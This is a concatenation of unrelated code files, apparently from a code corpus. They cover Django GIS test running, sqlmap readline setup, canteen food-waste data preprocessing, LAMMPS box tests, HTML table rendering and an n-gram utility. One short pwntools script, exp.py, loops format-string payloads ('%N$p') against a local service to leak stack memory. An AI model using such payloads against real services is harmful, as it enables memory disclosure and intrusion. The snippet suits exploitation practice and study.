rows: List[str] = self.get_nullable_dict_value(source, 'rows')
pagination_json = self.get_nullable_dict_value(source, 'pagination')
headers = ''
headers = headers + f'<th scope="col" class="pdi-column">#</th>'
for column in columns:
column_style = self.get_dict_value(column, 'style')
column_class = self.get_dict_value(column, 'class')
column_value = self.get_dict_value(column, 'value')
headers = headers + f'<th scope="col" style="{column_style}" class="pdi-column {column_class}">{column_value}</th>'
bodies = ''
index = 0
for row in rows:
bodies = bodies + '<tr>'
index = index + 1
bodies = bodies + f'<td valign="top" class="pdi-row ">{index}</td>'
for data in row['data']:
row_style = self.get_dict_value(data, 'style')
row_class = self.get_dict_value(data, 'class')
row_value = self.get_dict_value(data, 'value')
bodies = bodies + f'<td valign="top" style="{row_style}" class="pdi-row {row_class}">{row_value}</td>'
bodies = bodies + '</tr>'
table_width = width if width is not None else '100%'
pagination_html = ''
if pagination_json is not None:
page_data = ""
# JsonConvert.register(Pagination)
pagination = JsonConvert.FromJSON(json.dumps(pagination_json))
# TotalPage = self.get_nullable_dict_value(pagination, 'TotalPage')
for page in range(1, pagination.TotalPage + 1):
filter=f'{pagination.Filter}' if pagination.Filter is not None and pagination.Filter!='' else ''
page_url = pagination.PageUrl.format(f'?PageNumber={page}&Limit={pagination.Limit}&Filter={filter}')
if page == pagination.PageNumber:
page_data = f'{page_data}<a href="{page_url}" class="active">{page}</a>'
else:
page_data = f'{page_data}<a href="{page_url}" >{page}</a>'
pagination_html = f'''
<div class="pagination">
{page_data}
</div>
'''
table = f'''
<table width="{table_width}" cellpadding="0" cellspacing="0" style="min-width:100%;">
<thead>
{headers}
</thead>
<tbody>
{bodies}
</tbody>
</table>
{pagination_html}
'''
return table
def render_html(self,
content,
):
body_content = f'''
<div class="wrapper">
<div class="crumb">
<ul class="breadcrumb">
<li><a href="/Home">Home</a></li>
<li><a href="/Connection">Connections</a></li>
<li><a href="/DataOperation">DataOperations</a></li>
<li><a href="/DataOperation/Job">Jobs</a></li>
<li><a href="/DataOperation/Job/Execution">Executions</a></li>
<li><a href="/documentation">Documentation (Swagger UI)</a></li>
</ul>
</div>
{content}
</div>
'''
mail_body = self.mail_html_template(body_content)
return mail_body
| StarcoderdataPython |
141613 | import sys, unittest
from django.utils.importlib import import_module
def geo_suite():
"""
Builds a test suite for the GIS package. This is not named
`suite` so it will not interfere with the Django test suite (since
spatial database tables are required to execute these tests on
some backends).
"""
from django.conf import settings
from django.contrib.gis.geos import GEOS_PREPARE
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.utils import HAS_GEOIP
from django.contrib.gis.tests.utils import postgis, mysql
# The test suite.
s = unittest.TestSuite()
# Adding the GEOS tests.
from django.contrib.gis.geos import tests as geos_tests
s.addTest(geos_tests.suite())
# Tests that require use of a spatial database (e.g., creation of models)
test_apps = ['geoapp', 'relatedapp']
# Tests that do not require setting up and tearing down a spatial database.
test_suite_names = [
'test_measure',
]
# Tests applications that require a test spatial db.
if not mysql:
test_apps.append('distapp')
# Only PostGIS using GEOS 3.1+ can support 3D so far.
if postgis and GEOS_PREPARE:
test_apps.append('geo3d')
if HAS_GDAL:
# These tests require GDAL.
test_suite_names.extend(['test_spatialrefsys', 'test_geoforms'])
test_apps.append('layermap')
# Adding the GDAL tests.
from django.contrib.gis.gdal import tests as gdal_tests
s.addTest(gdal_tests.suite())
else:
print >>sys.stderr, "GDAL not available - no tests requiring GDAL will be run."
if HAS_GEOIP and hasattr(settings, 'GEOIP_PATH'):
test_suite_names.append('test_geoip')
# Adding the rest of the suites from the modules specified
# in the `test_suite_names`.
for suite_name in test_suite_names:
tsuite = import_module('django.contrib.gis.tests.' + suite_name)
s.addTest(tsuite.suite())
return s, test_apps
def run_gis_tests(test_labels, **kwargs):
"""
Use this routine as the TEST_RUNNER in your settings in order to run the
GeoDjango test suite. This must be done as a database superuser for
PostGIS, so read the docstring in `run_test()` below for more details.
"""
from django.conf import settings
from django.db.models import loading
from django.contrib.gis.tests.utils import mysql
# Getting initial values.
old_installed = settings.INSTALLED_APPS
old_root_urlconf = settings.ROOT_URLCONF
    # Overriding the INSTALLED_APPS with only what we need,
# to prevent unnecessary database table creation.
new_installed = ['django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.gis',
]
# Setting the URLs.
settings.ROOT_URLCONF = 'django.contrib.gis.tests.urls'
# Creating the test suite, adding the test models to INSTALLED_APPS, and
# adding the model test suites to our suite package.
gis_suite, test_apps = geo_suite()
for test_model in test_apps:
module_name = 'django.contrib.gis.tests.%s' % test_model
if mysql:
test_module = 'tests_mysql'
else:
test_module = 'tests'
new_installed.append(module_name)
# Getting the model test suite
tsuite = import_module(module_name + '.' + test_module)
gis_suite.addTest(tsuite.suite())
# Resetting the loaded flag to take into account what we appended to
# the INSTALLED_APPS (since this routine is invoked through
# django/core/management, it caches the apps; this ensures that syncdb
# will see our appended models)
settings.INSTALLED_APPS = new_installed
loading.cache.loaded = False
# Running the tests using the GIS test runner.
result = run_tests(test_labels, suite=gis_suite, **kwargs)
# Restoring modified settings.
settings.INSTALLED_APPS = old_installed
settings.ROOT_URLCONF = old_root_urlconf
return result
def run_tests(test_labels, verbosity=1, interactive=True, extra_tests=[], suite=None):
"""
Set `TEST_RUNNER` in your settings with this routine in order to
scaffold test spatial databases correctly for your GeoDjango models.
For more documentation, please consult the following URL:
http://geodjango.org/docs/testing.html.
"""
from django.conf import settings
from django.db import connection
from django.db.models import get_app, get_apps
from django.test.simple import build_suite, build_test, reorder_suite, TestCase
from django.test.utils import setup_test_environment, teardown_test_environment
# The `create_test_spatial_db` routine abstracts away all the steps needed
# to properly construct a spatial database for the backend.
from django.contrib.gis.db.backend import create_test_spatial_db
# Setting up for testing.
setup_test_environment()
settings.DEBUG = False
old_name = settings.DATABASE_NAME
# Creating the test spatial database.
create_test_spatial_db(verbosity=verbosity, autoclobber=not interactive)
# The suite may be passed in manually, e.g., when we run the GeoDjango test,
# we want to build it and pass it in due to some customizations. Otherwise,
# the normal test suite creation process from `django.test.simple.run_tests`
# is used to create the test suite.
if suite is None:
suite = unittest.TestSuite()
if test_labels:
for label in test_labels:
if '.' in label:
suite.addTest(build_test(label))
else:
app = get_app(label)
suite.addTest(build_suite(app))
else:
for app in get_apps():
suite.addTest(build_suite(app))
for test in extra_tests:
suite.addTest(test)
suite = reorder_suite(suite, (TestCase,))
    # Executing the tests (including the model tests), and destroying the
# test database after the tests have completed.
result = unittest.TextTestRunner(verbosity=verbosity).run(suite)
connection.creation.destroy_test_db(old_name, verbosity)
teardown_test_environment()
# Returning the total failures and errors
return len(result.failures) + len(result.errors)
| StarcoderdataPython |
136874 | <reponame>glaudsonml/kurgan-ai<gh_stars>10-100
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.data import logger
from lib.core.settings import IS_WIN
from lib.core.settings import PLATFORM
_readline = None
try:
from readline import *
import readline as _readline
except ImportError:
try:
from pyreadline import *
import pyreadline as _readline
except ImportError:
pass
if IS_WIN and _readline:
try:
_outputfile = _readline.GetOutputFile()
except AttributeError:
debugMsg = "Failed GetOutputFile when using platform's "
debugMsg += "readline library"
logger.debug(debugMsg)
_readline = None
# Test to see if libedit is being used instead of GNU readline.
# Thanks to <NAME> for this patch.
uses_libedit = False
if PLATFORM == 'mac' and _readline:
import commands
(status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)
if status == 0 and len(result) > 0:
# We are bound to libedit - new in Leopard
_readline.parse_and_bind("bind ^I rl_complete")
debugMsg = "Leopard libedit detected when using platform's "
debugMsg += "readline library"
logger.debug(debugMsg)
uses_libedit = True
# the clear_history() function was only introduced in Python 2.4 and is
# actually optional in the readline API, so we must explicitly check for its
# existence. Some known platforms actually don't have it. This thread:
# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
# has the original discussion.
if _readline:
try:
_readline.clear_history()
except AttributeError:
def clear_history():
pass
_readline.clear_history = clear_history
| StarcoderdataPython |
1635372 | <gh_stars>1-10
"""
Copyright 2018 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: <EMAIL>
"""
import inmanta.compiler as compiler
from inmanta.ast import Namespace
def test_multiline_string_interpolation(snippetcompiler):
snippetcompiler.setup_for_snippet(
"""
var = 42
str = \"\"\"var == {{var}}\"\"\"
""",
)
(_, scopes) = compiler.do_compile()
root: Namespace = scopes.get_child("__config__")
assert root.lookup("str").get_value() == "var == 42"
| StarcoderdataPython |
14707 | import os
import pandas as pd
import spacy
from sklearn.feature_extraction.text import CountVectorizer
import datetime
import numpy as np
from processing import get_annee_scolaire
if __name__ == "__main__":
#print("files", os.listdir("data_processed"))
##########################
    # Load the input data
##########################
path_g = os.path.join("data_processed", "greves.pk")
g = pd.read_pickle(path_g)
g["ind"] = g.ind.map(lambda x: 1 if x == "GREVE" else 0)
g = g[["taux_grevistes", "nos", "ind", "greves_manquantes"]]
path_m = os.path.join("data_processed", "menus.pk")
m = pd.read_pickle(path_m)
path_fe = os.path.join("data_processed", "frequentation_effectif.pk")
fe = pd.read_pickle(path_fe)
path_ferie = os.path.join("data_processed", "feries.pk")
feries = pd.read_pickle(path_ferie)
path_vacs = os.path.join("data_processed", "vacances.pk")
vacances = pd.read_pickle(path_vacs)
path_epidemies = os.path.join("data_processed", "epidemies.pk")
epidemies = pd.read_pickle(path_epidemies)
path_religions = os.path.join("data_processed", "religions.pk")
religions = pd.read_pickle(path_religions)
##########################
    # Join the different datasets on date
##########################
df = fe.groupby("date")[["prevision", "reel", "effectif"]].sum().join(g).join(m).join(feries).join(vacances).join(epidemies).join(religions)
##########################
    # Fill in missing values
##########################
for col in df.isnull().sum()[df.isnull().sum()>0].index.drop("menu"):
df[col] = df[col].fillna(0)
df["menu"] = df["menu"].map(lambda x: x if type(x) == list else [])
####################################
    # Add day, month, week, school year and Christmas-meal indicators
####################################
dic_jour = {0: "Lundi", 1: "Mardi", 2: "Mercredi", 3: "Jeudi", 4: "Vendredi", 5: "Samedi", 6: "Dimanche"}
dic_mois = {1: "Janvier", 2: "Fevrier", 3: "Mars", 4: "Avril", 5: "Mai", 6: "Juin", 7: "Juillet", 8: "Aout",
9: "Septembre", 10: "Octobre", 11: "Novembre", 12: "Decembre"}
df["jour"] = df.index.weekday
df["jour"] = df["jour"].apply(lambda x: dic_jour[x])
df["semaine"] = df.index.week
df["mois"] = df.index.month
df["mois"] = df["mois"].apply(lambda x: dic_mois[x])
df["annee_scolaire"] = df.index.to_series().map(get_annee_scolaire)
date_repas_noel = ["2012-12-20", "2013-12-19", "2014-12-18", "2015-12-17", "2016-12-15",
"2017-12-21", "2018-12-20"]
l_noel = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in date_repas_noel]
df_noel = pd.DataFrame(l_noel, columns=["date"])
df_noel["repas_noel"] = 1
df = df.join(df_noel.set_index("date"))
df["repas_noel"] = df["repas_noel"].fillna(0)
####################################
    # Add the food-waste (gaspillage) targets
####################################
assert df.isnull().sum().sum() == 0
df["gaspillage_volume"] = df["prevision"] - df["reel"]
df["gaspillage_pourcentage"] = 100 * (df["prevision"] - df["reel"]) / df["prevision"]
####################################
    # Add menu-related variables
####################################
nlp = spacy.load("fr_core_news_sm")
corpus = df['menu'].apply(lambda x: "".join([i + " " for i in x]))
corpus = corpus.dropna()
    # custom stop-word list: French stop words plus noise tokens found in the menus
liste = ['04', '10', '17', '18225', '2015', '2016', '220gr', '268', '29', '500', '500g', '5kg', '850''500', '500g',
'5kg', '850', 'ab', 'an', 'au', 'aux', 'avec', 'baut', 'bbc', 'de', 'des', 'du', 'en', 'et', 'gr', 'kg',
'la', 'le', 'les', 'ou', 'par', 's17', 'sa', 'sans', 'ses', 'son']
# Create CountVectorizer object
vectorizer = CountVectorizer(strip_accents='ascii', stop_words=liste, lowercase=True, ngram_range=(1, 1))
# Generate matrix of word vectors
bow_matrix = vectorizer.fit_transform(corpus)
# Convert bow_matrix into a DataFrame
bow_df = pd.DataFrame(bow_matrix.toarray())
# Map the column names to vocabulary
bow_df.columns = vectorizer.get_feature_names()
bow_df.index = df.index
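    # Binary menu features: a day is flagged if any keyword from the corresponding
    # list appears among that day's menu tokens.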
    # pork feature
l_porc = ["carbonara", "carbonata", "cassoulet", "chipo", "chipolatas", "choucroute",
"cordon", "croziflette", "francfort", "jambon", "knacks", "lardons", "porc", "rosette",
"saucisse", "saucisses", "tartiflette"]
df["porc"] = sum([bow_df[alim] for alim in l_porc])
df['porc'] = df['porc'] > 0
df['porc'] = df['porc'].astype('int')
    # meat feature
l_viande = ["roti", "agneau", "blanquette", "boeuf", "boudin", "boulettes",
"bourguignon", "bourguignonne", "canard", "carne", "chapon", "colombo",
"couscous", "dinde", "escalope", "farci", "foie", "kebab", "lapin", "merguez",
"mouton", "napolitaines", "nuggets", "paupiette", "pintade",
"poulet", "steak", "stogonoff", "strogonoff", "tagine", "tajine",
"veau", "viande", "volaile", "volaille", "carbonara", "carbonata", "cassoulet", "chipo", "chipolatas",
"choucroute", "cordon", "croziflette", "francfort", "jambon", "knacks", "lardons", "porc", "rosette",
"saucisse", "saucisses", "tartiflette", "parmentier"]
df["viande"] = sum([bow_df[alim] for alim in l_viande])
df['viande'] = df['viande'] > 0
df['viande'] = df['viande'].astype('int')
df = df.reset_index().rename(columns = {"index":"date"})
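    # Hand-checked dates flagged as meat menus even though the keyword matching
    # above missed them.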
l_index = ["2018-01-22", "2017-10-09", "2017-05-09", "2016-10-18", "2016-04-25", "2015-05-26", "2014-11-24",
"2014-05-26", "2014-03-31", "2014-01-20", "2012-01-16", "2012-01-30", "2012-07-02", "2012-10-01",
"2011-01-17", "2011-01-31", "2011-09-13", "2015-06-22", "2015-01-19", "2014-06-30", "2012-06-18",
"2011-06-20"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# special handling of Neapolitan lasagne to avoid confusion with fish lasagne
l_index = ["2016-02-22", "2016-02-04", "2015-11-23", "2015-11-17", "2015-10-05",
"2015-05-04", "2015-01-26", "2014-12-15", "2013-09-23", "2012-10-09", "2012-05-21", "2012-02-27",
"2011-11-03", "2011-09-05", "2011-05-09", "2012-12-10", "2013-12-02", "2014-05-12", "2016-05-09"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# special handling of terms that can describe either sautéed fish or meat dishes: chili, pot-au-feu, bolognese, stuffed courgette, ravioli
l_index = ["2016-01-28", "2016-03-17", "2016-03-07", "2015-09-15", "2012-12-06", "2012-05-03", "2012-02-09",
"2011-11-03",
"2011-09-13", "2011-06-07", "2011-04-04", "2014-06-12", "2012-11-12", "2015-06-22"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# special handling of vegetarian parmentier and soy steak
l_index = ["2019-11-25", "2014-06-20"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 0
# feature poisson
l_poisson = ["poissons", "sardines", "perray", "thon", "calamar", "lieu", "colin", "crabe", "crevette", "crustace",
"dorade", "maquereau", "poisson", "rillette", "sardine", "saumon"]
df["poisson"] = sum([bow_df[alim] for alim in l_poisson])
df['poisson'] = df['poisson'] > 0
df['poisson'] = df['poisson'].astype('int')
df.loc[(df['viande'] == 1) & (df['poisson'] == 1), 'poisson'] = 0
# special handling of fish parmentier, fish nuggets, soy steak, tuna loaf and salmon carbonara
l_index = ["2019-05-17", "2019-05-17", "2019-02-01", "2018-11-23", "2018-10-19", "2018-09-14", "2018-06-05",
"2018-03-27", "2018-01-16", "2017-12-01", "2017-09-22", "2017-05-05", "2016-05-03", "2016-02-26",
"2016-01-15", "2015-11-20", "2015-09-22", "2015-09-08", "2015-06-05", "2014-09-08", "2014-03-25",
"2014-02-18", "2014-01-24", "2013-12-10", "2013-11-29", "2013-10-01", "2012-12-14", "2012-10-19",
"2012-09-21", "2012-03-16", "2012-01-20", "2011-09-09", "2011-03-18", "2019-03-08"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 0
df.loc[df[df["date"] == i].index, "poisson"] = 1
# special handling of seafood paella and fillet
l_index = ['2011-01-10', '2012-01-09', '2011-01-07', "2012-01-06"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 1
# 2 menus (veggie and meat): we treat it as a veggie menu
l_index = ["2015-11-13", "2015-09-11"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 0
df.loc[df[df["date"] == i].index, "viande"] = 0
# 2 menus (fish and meat): we treat it as a fish menu
l_index = ["2015-11-20", "2015-10-16", "2015-10-02", "2015-09-25", "2015-09-18", "2015-09-04", "2015-06-25",
"2015-06-11"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 1
df.loc[df[df["date"] == i].index, "viande"] = 0
# unknown menu, but probably contains meat according to the model
df.loc[df[df["date"] == datetime.datetime.strptime("2015-10-15", "%Y-%m-%d")].index, "viande"] = 1
# feature bio
df['bio'] = bow_df["bio"]
# set date as index
df = df.set_index("date")
###############################################################
# Flag the first 4 and last 4 days of each school year (high uncertainty)
#############################################################
ind = []
temp = []
subset = df.copy()
#print("subset", subset["annee_scolaire"].unique()[1:])
for i in range(1, 5):
for annee in subset["annee_scolaire"].unique()[1:]:
temp.append(min(subset[(subset.index.year == min(subset[subset["annee_scolaire"] == annee].index.year)) & (
subset["annee_scolaire"] == annee)].index))
df.loc[temp, "4_premiers_jours"] = 1
ind.append(temp)
subset.drop(temp, inplace=True)
temp = []
for i in range(1, 5):
for annee in subset["annee_scolaire"].unique()[:-1]:
temp.append(max(subset[(subset.index.year == max(subset[subset["annee_scolaire"] == annee].index.year)) & (
subset["annee_scolaire"] == annee)].index))
df.loc[temp, "4_derniers_jours"] = 1
ind.append(temp)
subset.drop(temp, inplace=True)
temp = []
df["4_derniers_jours"].fillna(0, inplace=True)
df["4_premiers_jours"].fillna(0, inplace=True)
####################################
# Checks (length and missing values)
####################################
assert len(df) == 1188
df.to_pickle("data_processed/global.pk")
df.to_excel("data_processed/global.xlsx")
| StarcoderdataPython |
61551 | <reponame>tboser/nodevectors
from nodevectors.evaluation.graph_eval import *
from nodevectors.evaluation.link_pred import *
| StarcoderdataPython |
4804644 | import pickle
import logging
from .monitor import *
from .context import text_model_filename
from .textset import *
from .utils.text_encoders import *
from .spaces.process import space_textset_bow, space_textset_w2v, space_textset_d2v
log = logging.getLogger(__name__)
def get_textset_w2v(textset_id, model, size):
"""
    get the w2v or d2v model trained on the given textset, for the given vector size
:param textset_id: id of the textset
:param model: model (w2v / d2v)
:param size: dimension (100 or 200)
:return: model
"""
if model not in ['w2v', 'd2v']:
raise ValueError('model must be w2v or d2v')
if size not in [100, 200]:
raise ValueError('size must be 100 or 200')
textset = get_textset(textset_id)
#if textset.status != 'created':
# raise ValueError('textset status must be created')
return pickle.load(open(get_data_folder() + '/texts/w2v_%d_%d.pkl' % (textset_id, size), 'rb'))
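# Illustrative call (added for clarity; the textset id and size below are hypothetical
# and assume a w2v model has already been trained and pickled for that textset):
#   model = get_textset_w2v(textset_id=3, model='w2v', size=100)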
def worker_text_loop():
"""
    periodically poll the receiver queue for a search job
:return:
"""
while True:
heart_beep('worker_text', '')
# check the list of datasets
for ts in get_textset_list():
if ts.status != 'completed':
heart_beep('worker_text', {'textset_id': ts.textset_id, 'textset_name': ts.name})
log.info('searching textset %s' % ts.textset_id)
# read textset
textset = get_textset(ts.textset_id)
set_key_store('textset:%s:status' % ts.textset_id, 'searching')
# import text
with open(textset.filename, 'r') as f:
text = f.readlines()
# calculate models
for conf in space_textset_bow:
pickle.dump(model_bow(text, conf), open(text_model_filename(ts.textset_id, 'bow', conf), 'wb'))
for conf in space_textset_w2v:
pickle.dump(model_word2vec(text, conf), open(text_model_filename(ts.textset_id, 'w2v', conf), 'wb'))
for conf in space_textset_d2v:
pickle.dump(model_doc2vec(text, conf), open(text_model_filename(ts.textset_id, 'd2v', conf), 'wb'))
# update status to completed
set_key_store('textset:%s:status' % ts.textset_id, 'completed')
| StarcoderdataPython |
3298748 | import pytest
from time import sleep
from utilities import XLUtility
from pageObjects.common_functions.common_methods import CommonMethods
@pytest.mark.usefixtures("one_time_setup")
class Test_TC208_103_MobileCreateAccount:
@pytest.fixture(autouse=True)
def class_setup(self, one_time_setup):
self.driver.set_window_size(411, 823)
def test_mobile_create_account(self):
common = CommonMethods(self.driver)
# get all the required data
client_portal_url = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 2)
first_name = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 3)
last_name = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 4)
birth_date = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 5)
phone_no = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 6)
email_id = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 7)
passwd = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 8)
client_name = first_name + " " + last_name
self.driver.get(client_portal_url)
self.client_portal_page_obj.clk_mobile_menu()
self.client_portal_page_obj.clk_create_account()
common.create_client_portal_user(first_name, last_name, birth_date, phone_no, email_id, passwd)
sign_in_message = self.client_portal_page_obj.capture_sign_in_message()
exp_sign_in_message = "Success! You have created your account."
sleep(1)
# delete the new account created
self.logIn()
self.login_page_obj.clk_navigation_btn()
self.login_page_obj.clk_mobile_client_prospects()
self.client_page_obj.mobile_sel_prospect_name(client_name)
self.client_page_obj.clk_delete_user()
if sign_in_message == exp_sign_in_message:
self.log.info("{} passed!".format(__name__))
assert True
else:
self.log.info("{} failed!".format(__name__))
assert False
| StarcoderdataPython |
1611868 | <filename>Examples/stack/exp.py
from pwn import *
context.log_level = 'error'
def leak(payload):
sh = remote('127.0.0.1', 9999)
sh.sendline(payload)
data = sh.recvuntil('\n', drop=True)
if data.startswith('0x'):
print p64(int(data, 16))
sh.close()
i = 1
while 1:
payload = '%{}$p'.format(i)
leak(payload)
i += 1
| StarcoderdataPython |
65172 | <gh_stars>1-10
from math import pi
import pytest
import numpy as np
import lammps
def test_lattice_const_to_lammps_box_cubic():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (0, 0, 0)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_const_to_lammps_box_cubic_offset_origin():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_to_lammps_box_cubic_transform():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
points = np.random.random((10, 3))
points_new_1 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix)
assert np.all(np.isclose(points, points_new_1))
points_new_2 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix, origin)
assert np.all(np.isclose(points + origin, points_new_2))
def test_lattice_const_to_lammps_box_rhomb():
# 3C-SiC
lengths = (3.0968, 3.0968, 3.0968)
angles = (pi/3, pi/3, pi/3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, ((0, 3.0968), (0, 2.6819074704396493), (0, 2.528526611816982)), atol=1e-3))
assert np.all(np.isclose(tilts, (1.5484000000000004, 1.5484000000000004, 0.8939691568132165)))
def test_lammps_box_to_lattice_const_cubic():
bounds = [[0, 5], [0, 5], [0, 5]]
tilts = (0, 0, 0)
origin = (0, 0, 0)
lengths, angles, origin = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, (5, 5, 5)))
assert np.all(np.isclose(angles, (pi/2, pi/2, pi/2)))
def test_lammps_box_orthogonal_reversible():
lengths = (4, 4, 4)
angles = (pi/2, pi/2, pi/2)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_box_tetrahedral_reversible():
# LiTaO3
lengths = (5.5338, 5.5338, 5.5338)
angles = (56.14486291 * pi/180, 56.14486291 * pi/180, 56.14486291 * pi/180)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_initial_box(lmp):
assert lmp.box.dimension == 3
assert np.all(np.isclose(lmp.box.lengths, (1., 1., 1.)))
assert np.all(np.isclose(lmp.box.angles, (pi/2., pi/2., pi/2.)))
assert np.all(np.isclose(lmp.box.bounds, [[-0.5, 0.5], [-0.5, 0.5], [-0.5, 0.5]]))
assert np.all(np.isclose(lmp.box.tilts, [0, 0, 0]))
assert np.all(np.isclose(lmp.box.lengths_angles, [[1, 1, 1], [pi/2, pi/2, pi/2]]))
# lammps has some seriously weird initial behavior
# has unit cell 1x1x1 with volume 0 ???
# actually has non-deterministic behavior 0 or inf
# assert np.isclose(lmp.box.volume, 0.)
def test_lammps_set_box_from_lattice_const(lmp):
atom_types = 5
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.from_lattice_const(atom_types, lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert lmp.system.total == 0
assert len(lmp.system.atom_types) == atom_types
assert np.isclose(lmp.box.volume, 10**3)
def test_lammps_update_lattice_const(lmp):
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.update_lattice_const(lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert np.isclose(lmp.box.volume, 10**3)
| StarcoderdataPython |
33188 | <filename>data/external/repositories/113677/KaggleBillionWordImputation-master/scripts/util.py<gh_stars>0
import sys, bisect
from collections import defaultdict
from itertools import islice, izip
import numpy as np
from scipy.misc import logsumexp
from scipy.spatial import distance
import Levenshtein
PUNCTUATION = set(("'", '"', ',', '.', '!', '?', ';', ':', '-', '--', '(', ')',
'/', '_', '\\', '+', '<', '>', '|', '@', '#', '$', '%', '^',
'&', '*', '[', ']', '{', '}'))
POS_TAGS = set(('UH','WP$','PDT','RBS','LS','EX','WP','$','SYM','RP','CC','RBR','VBG','NNS','CD','PRP$','MD','DT','NNPS','VBD','IN','JJS','WRB','VBN','JJR','WDT','POS','TO','NNP','JJ','RB','VB','FW','PRP','VBZ','NN','VBP'))
UNKNOWN = '<unknown>'
def is_punctuation(word):
return (word in PUNCTUATION)
def is_number(word):
try:
x = float(word)
return True
except:
return False
def is_pos_tag(word):
return (word in POS_TAGS)
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
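# Example of the sliding window above (added for illustration only):
#   list(window(['w1', 'w2', 'w3', 'w4'], n=2))
#   -> [('w1', 'w2'), ('w2', 'w3'), ('w3', 'w4')]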
def tokenize_words(line, delim=' '):
return line.rstrip().split(delim)
def pos_tag(word):
return word.rsplit('_', 1)[-1]
def ngram_frequencies(istream, n=1):
counts = defaultdict(int)
for i, line in enumerate(istream):
if i % 100000 == 0:
print >>sys.stderr, i
words = tokenize_words(line)
for ngram in window(words, n):
counts[ngram] += 1
return counts
def words2ids(words, idmap):
ids = []
for word in words:
if word not in idmap:
idmap[word] = len(idmap)
ids.append(idmap[word])
return ids
def ngram_frequencies2(istream, n=1):
unigrams = dict()
counts = defaultdict(int)
